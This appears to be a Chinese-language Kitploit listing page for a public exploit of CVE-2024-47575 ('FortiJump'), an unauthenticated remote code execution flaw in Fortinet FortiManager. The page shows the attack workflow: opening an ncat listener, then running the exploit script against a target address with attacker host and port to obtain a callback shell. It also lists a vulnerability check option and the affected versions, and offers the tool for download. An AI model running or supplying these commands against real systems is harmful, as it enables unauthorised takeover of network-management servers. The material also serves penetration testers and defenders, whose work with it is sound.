Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Fortijump-Exploit-CVE-2024-47575 — Fortinet Fortimanager 未授权远程代码执行 又名 FortiJump CVE-2024-47575 | Kitploit
工具/GitHubGitHub/watchtowrlabs/fortijump-exploit-cve-2024-47575
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubwatchtowrlabs/fortijump-exploit-cve-2024-47575

Fortijump-Exploit-CVE-2024-47575

Fortinet Fortimanager 未授权远程代码执行 又名 FortiJump CVE-2024-47575

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
973051年前Kitploit 审核通过
分享

CVE-2024-47575

Fortinet FortiManager 未经身份验证的远程代码执行,又名 FortiJump CVE-2024-47575

查看我们的博客文章了解技术细节

首先,建立你的 ncat 会话:

root@kitploit:~
nc -lvvnp 80

然后,执行我们的检测产物生成器:

root@kitploit:~
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

仅检查漏洞时,使用以下选项:

root@kitploit:~
python3 CVE-2024-47575.py --target 192.168.1.110 --action check

受影响版本

root@kitploit:~
FortiManager 7.6.0
FortiManager 7.4.0 至 7.4.4
FortiManager 7.2.0 至 7.2.7
FortiManager 7.0.0 至 7.0.12
FortiManager 6.4.0 至 6.4.14
FortiManager 6.2.0 至 6.2.12
FortiManager Cloud 7.4.1 至 7.4.4
FortiManager Cloud 7.2.1 至 7.2.7
FortiManager Cloud 7.0.1 至 7.0.12
FortiManager Cloud 6.4

漏洞作者

此漏洞利用程序由 watchTowr (@watchtowrcyber) 团队的 编写

Sina Kheirkhah (@SinSinology)

关注 watchTowr 实验室

获取最新安全研究,请关注 watchTowr 实验室团队

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
下载工具